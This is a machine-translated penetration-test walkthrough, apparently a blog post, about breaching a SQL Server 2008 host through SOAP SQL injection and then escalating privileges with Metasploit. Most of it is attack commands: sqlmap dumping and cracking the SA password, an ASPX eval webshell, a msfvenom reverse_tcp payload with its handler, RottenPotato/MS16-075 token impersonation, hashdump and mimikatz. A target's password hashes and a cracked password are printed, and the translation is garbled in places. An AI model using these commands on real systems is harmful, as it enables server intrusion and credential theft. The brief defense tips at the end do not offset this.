Soap injects a sql2008 server in conjunction with MSF for power

Soapinject asql2008Server CombinationMsfthe right to be raised

Simeon

In the actual success of the XXX process, the use of loopholes are a combination of multiple technologies, the practice of the latest technology, the XXX use Sqlmap to confirm the injection point, through the sqlmap to obtain Webshell, combined with MSF to carry out the ms16-075, finally obtained the target server system permissions. This paper is a new extension of exploit, in the case of the nday of the conventional power, combined with MSF, a classic case of ms16-075 successfully.

1.1.1 Scan SOAP Injection vulnerability

1. Using the Web Services scanner in AWVS for vulnerability scanning

Open Awvs, select Web Services scanner for vulnerability scanning, 1, in the WSDL URL to fill in the destination URL address, note must be asmx?wsdl, there are asmx files, if not, you can fill directly, for example: Http://1**.* **.***.***:8081/?wsdl.

Figure 1 A SOAP injection vulnerability scan

2. Handling SQL Blinds

With the AWVS Scan, verify that the URL address exists at the SQL Blind (26), in Awvs, click on the right "view HTTP Headers", copy its contents into a text file, and also handle the vulnerable statement, in this example: <urn:string >-1&apos; or 3*2*1=6 and 000223=000223 or &apos;gPireHft&apos;=&apos;</urn:string>

You need to replace the Red Word chart with " -1*".

3. The complete header package reads as follows:

Post/service1.asmx http/1.1

Content-type:text/xml

SOAPAction: "Http://tempuri.org/ZcpdList"

content-length:716

X-requested-with:xmlhttprequest

Referer: http://1**.***.***.***:8081/?wsdl

host:1**.***.***.***:8081

Connection:keep-alive

Accept-encoding:gzip,deflate

user-agent:mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.21 (khtml, like Gecko) chrome/41.0.2228.0 safari/537.21

Accept: */*

<soap-env:envelope xmlns:soap-env= "http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap= "http// schemas.xmlsoap.org/wsdl/soap/"xmlns:xsd=" Http://www.w3.org/1999/XMLSchema "xmlns:xsi=" http://www.w3.org/1999/ Xmlschema-instance "xmlns:m0=" http://tempuri.org/"xmlns:soap-enc=" http://schemas.xmlsoap.org/soap/encoding/" Xmlns:urn= "http://tempuri.org/" xmlns:urn2= "Http://tempuri.org/AbstractTypes" >

<SOAP-ENV:Header/>

<SOAP-ENV:Body>

<urn:ZcpdList>

<urn:Inventory_dhs>

<urn:string>-1*</urn:string>

</urn:Inventory_dhs>

</urn:ZcpdList>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>

Response

1.1.2 Confirm SOAP Injection Vulnerability

1. Using Sqlmap to detect the presence of a SQL injection vulnerability

Save the contents of the previous header as 1**.***.***.***.txt, copy the file to the directory where the sqlmap.py program is located, execute the command: Sqlmap.py-r 1**.***.***.***.txt, Confirm the information of the SQLMAP prompt:

Custom injection Marker (' * ') found in option '--data '. Does want to process it? [y/n/q] y

Soap/xml data found in POST data. Does want to process it? [y/n/q] y

as shown in 2, SQLMAP confirms that the SQL injection vulnerability exists and that the database server is Windows R2, and that the database version of SQL Server 2008,soap has a vulnerability to union query.

Figure 2 A SOAP injection vulnerability exists

2. See if the database has DBA authority

(1) Automatic submission of parameters for testing

3, execute command: sqlmap.py-r 1**.***.***.***.txt--is-dba--batch, but also two times to confirm Y, because the use of the parameter "batch", Sqlmap will automatically submit the judgment value.

Figure 3 Automatic submission of parameters for judgment

(2) The user who gets the current database is the DBA account.

As shown in 4, getting the current user in Sqlmap is the DBA, which displays the result as true. The result indicates that the database is using SA permissions and can be obtained through the Os-shell parameter. Webshell.

Figure 4 Determining if the DBA account is

3. Get the sa account password

As shown in 5, use the command sqlmap.py-r 1**.***.***.***.txt--password--batch to get the password value for all accounts connected to the database directly:

Figure 5 Obtaining the SA account password

4. Break the SA account password

The hash value of its database password was successfully obtained by SQLMAP in front:

[*] # #MS_PolicyEventProcessingLogin # # [1]:

Password hash:0x01001a7b0c5b5b347506dbc67aa8ffa2ad20f852076d8446a838

[*] # #MS_PolicyTsqlExecutionLogin # # [1]:

Password hash:0x01006c6443e1e42ca27773d413042ee8af2eea9026d44c8d4d1c

[*] SA [1]:

Password Hash:0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28

The SA corresponding password value "0x0100b7b90b706f339288fb0ab4c8a099c4de53045d2de6297e28" is queried in www.cmd5.com, 6, and its decryption result is "qaz123wsx".

Figure 6 Decrypting the sa password hash value

1.1.3 Get Webshell through--os-shell

1. Get Os-shell

Execute the command in Sqlmap: Sqlmap.py-r 1**.***.***.***.txt--os-shell, confirm the information in the Sqlmap execution window:

Custom injection Marker (' * ') found in option '--data '. Does want to process it? [y/n/q] Y

Soap/xml data found in POST data. Does want to process it? [y/n/q] Y

Do you want Sqlmap to try to optimize value (s) for DBMS delay responses (option '--time-sec ')? [y/n]

You can also perform sqlmap.py-r 1**.***.***.***.txt--os-shell--batch commands without manual input.

2. Find the directory where the Web application is located

(1) Viewing files and directories

After you execute the dir c: \ command, you can view the directories and files, and continue to see "dir c:\inetpub\wwwroot" 7, where there is no Web program to exclude the directory.

Figure 7 Viewing files and directories

(2) Get the real directory of the website

By looking at the C, D, E, and F drives, get the suspected website program files on the e-disk, and use the commands to view the Dir e:\software\ams_noflow,8.

Figure 8 Viewing Web site files

3. Testing the real-world Site Directory

(1) Generate file test

9, use the echo command: echo "thisis test" >e:\software\ams_noflow\t.txt to generate the T.txt file under the Web site root. The content is Thisis test.

Figure 9 Generating files

(2) Website Access test

Enter address Http://1**.***.***.***/1.txt in the browser to test, 10, get the content as expected, the directory is the real physical address of the site.

Figure 10 Site Access Testing

4. Get the Web. config profile contents

In Os-shell, execute the type e:\software\AMS_NoFlow\ The Web. config command looks at the contents of the Web. config file, and may not be able to view the full contents of the Sqlmap Command window due to setup problems, but sqlmap in its output directory, will keep the details, 11, open its log file, you can see its SA account corresponding password for QA Z123WSX, consistent with the SA password previously cracked.

Figure 11 Viewing the Web. config configuration file contents

5. Obtaining IP address information

As shown in 12, the ipconfig command in Os-shell can be used to obtain the IP address configuration of the target, which is externally configured with an independent extranet IP and an intranet IP address, and other commands may be executed in Os-shell.

Figure 12 Obtaining an IP address

6. Get Webshell Test

(1) Generate Shell file

Execute command in Os-shell: Echo ^<%@ page language= "Jscript"%^>^<%eval (request.item["Pass", "unsafe");%^> > E:\ Software\ams_noflow\cmd.aspx

As shown in 13, the Echo result shows 1, no additional information, and the surface-generated file command succeeds.

Figure 13 Generating Webshell

(2) Get Webshell

Use Chinese kitchen knife backdoor management tool, create record http://1**.***.***.***/cmd.aspx, a word backdoor password: pass,14, successful connection, successful acquisition Webshell.

Figure 14 Getting Webshell

1.1.4 conventional method of power failure

1. Generate System Information files

Execute commands in Os-shell: systeminfo > Syd1-0081dsb.txt

2. Download the Windows-exploit-suggester program

windows-exploit-suggester:https://github.com/gdssecurity/windows-exploit-suggester/

3. Update the vulnerability Library and make a vulnerability comparison

Perform windows-exploit-suggester.py-u updates in Python, while making a comparison of the vulnerability libraries:

windows-exploit-suggester.py--audit-l--database 2018-06-04-mssb.xls--systeminfo SYD1-0081DSB.txt > As shown in syd1-0081dsb-day.txt,15.

Figure 15 Vulnerability comparison

4. View vulnerability situation

In the C:\Python27 directory open syd1-0081dsb-day.txt file, 16, you can see that the program determines that the operating system is a Windows version R2, and there are multiple vulnerabilities, the latest vulnerability is ms16-075.

Figure 16 Viewing the vulnerability situation

5. The right to test the existence of loopholes

According to the vulnerability number, find and organize the exp file, on the target server to carry out the right to test, in addition to the MS16-075EXP, the test failed, unable to raise power.

1.1.5 ms16-075 right with MSF

1. Using MSF to generate bounce XXX

Execute the command under MSF:

Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.33 lport=4433-f exe-o 4433.exe

Where the windows/meterpreter/reverse_tcp bounce port type, Lhost is the server IP address of the bounce connection, note that the IP address must be a standalone server, or must be an extranet port mapping, in other words, the bounce must be able to receive, Lport for the bounced port, 4433 for the generated program.

2. Execute the Listen command on the listener server

(1) Start MSF

Msfconsole

(2) Configuring Meterpreter parameters

Use Exploit/multi/handler

Set PAYLOAD windows/meterpreter/reverse_tcp

Set Lhost 192.168.1.33

Set Lport 4433

Exploit

3. Upload 4433.exe program to target server and execute

Upload the 4433.exe file to the target server and execute it via Chinese color knife or os-shell.

4. View System Information

As shown in 17, the target bounces to the listening server, executes SysInfo, and obtains its system information.

Figure 17 Getting System Information

5. Failed to use Meterpreter to bring up the power function

The Getuid and Getsystem commands were executed separately in Meterpreter, as shown in 18, which failed to be successfully mentioned.

Figure 18 using the default Meterpreter to raise a power failure

6. Use of ms16-075 for power of reference

(1) ms16-075 can use exp to download

Https://github.com/foxglovesec/RottenPotato

(2) Upload potato file

Upload the Potato.exe file via Webshell, or perform a command upload under MSF:

Upload/root/potato.exe

(3) Get system permissions

Execute the following command in turn:

Use Incognito

List_tokens-u

Execute-ch-f./potato.exe

List_tokens-u

19, the system permissions are successfully obtained.

Figure 19 Getting system permissions Tokens

(4) Get system permissions

Execute the command separately:

Impersonate_token "NT Authority\\System"

Getuid

20, the system permissions are successfully obtained.

Figure 20 Getting system permissions

(5) Get the password

Execute command under Meterpreter: The Run hashdump command, 21, successfully obtains the server password hash value:

administrator:500:aad3b435b51404eeaad3b435b51404ee:a59a64a645487c1581dea603253c7920:::

Figure 21 Getting the password

In this case, the use of the load Mimikatz for plaintext password acquisition, but the result is not ideal, execute the command:

Kerberos, LIVESSP, MSV, SSP, tspkg, wdigest get no plaintext password, you can also execute command mimikatz_command and proceed to the Mimikatz command prompt.

(6) Crack ntml password

Copy the ntml password hash value a59a64a645487c1581dea603253c7920 to cmd5.com for cracking, cmd5 pay for it, and you can go to:

http://www.objectif-securite.ch/en/ophcrack.php and https://www.somd5.com/website for password cracking, 22 shown, successfully cracked password.

Figure 22 Decoding the NTLM hash value

7. Log in to the server

Port scanning via nmap-ss-pn-a 1**.***.***.*** or masscan-p 1-65535 1**.***.***.***, found that the server opened 3389 ports, using MSTSC to log in, 23, successfully logged on to the server.

Figure 23 successfully logged in to the server

1.1.6 Summary and Defense

1. This xxx main command summary

(1) Sqlmap Execution order

Sqlmap.py-r 1**.***.***.***.txt

Sqlmap.py-r 1**.***.***.***.txt--is-db

Sqlmap.py-r 1**.***.***.***.txt--password--batch

Sqlmap.py-r 1**.***.***.***.txt--os-shell

(2) Execute command under Os-shell

Ipconfig

Dir c:/

echo "Thisis test" >e:\software\ams_noflow\t.txt

echo ^<%@ page language= "Jscript"%^>^<%eval (request.item["Pass"], "unsafe");%^> > E:\software\AMS_ Noflow\cmd.aspx

(3) Execution of commands under MSF

Generate Bounce XXX:

Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.33 lport=4433-f exe-o 4433.exe

(4) MSF start-up and monitoring

Msfconsole

Use Exploit/multi/handler

Set PAYLOAD windows/meterpreter/reverse_tcp

Set Lhost 192.168.1.33 ( actually an extranet IP address )

Set Lport 4433

Exploit

(5) ms16-075 the right to lift the order

Use Incognito

List_tokens-u

Execute-ch-f./potato.exe

List_tokens-u

Impersonate_token "NT Authority\\System"

Getuid

(6) Get the password

Run Hashdump

(7) Mimikatz for password acquisition

Load Mimikatz

Kerberos, LIVESSP, MSV, SSP, tspkg, wdigest (command-by-test, some display clear-text passwords)

Mimikatz_command:mimikatz Command Prompt window

(8) Mimikatz command line to get the password (not tested)

Privilege::d Ebug

Sekurlsa::logonpasswords

2.xxx Summary

In this xxx, through Sqlmap soap injection test, through the SQLMAP to determine the SQL injection point is available, the subsequent Os-shell successfully obtained Webshell. After acquiring Webshell, try to pass the normal Nday method, the result fails, follow up through MSF cooperate ms16-075 to carry on the right. It is still possible for windows-exploit-suggester to judge and test the local vulnerability, through its audit, the right to use the latest vulnerability, the basic hit rate of 99%.

3. Security Defense

After the successful XXX server, there is no security protection software found on the server, based on experience, I recommend the following security defense:

(1) Filtering the SOAP parameters, filtering out some of the dangerous parameters that lead to SQL injection.

(2) The MSSQL database uses low-privileged users for database connections.

(3) The server periodically updates the patch upgrade.

(4) Install anti-virus software, WAF and hardware firewall, increase the cost and difficulty of XXX

For more Sqlmap technical articles, please subscribe to HTTP://BLOG.51CTO.COM/CLOUMN/DETAIL/3

Soap injects a sql2008 server in conjunction with MSF for power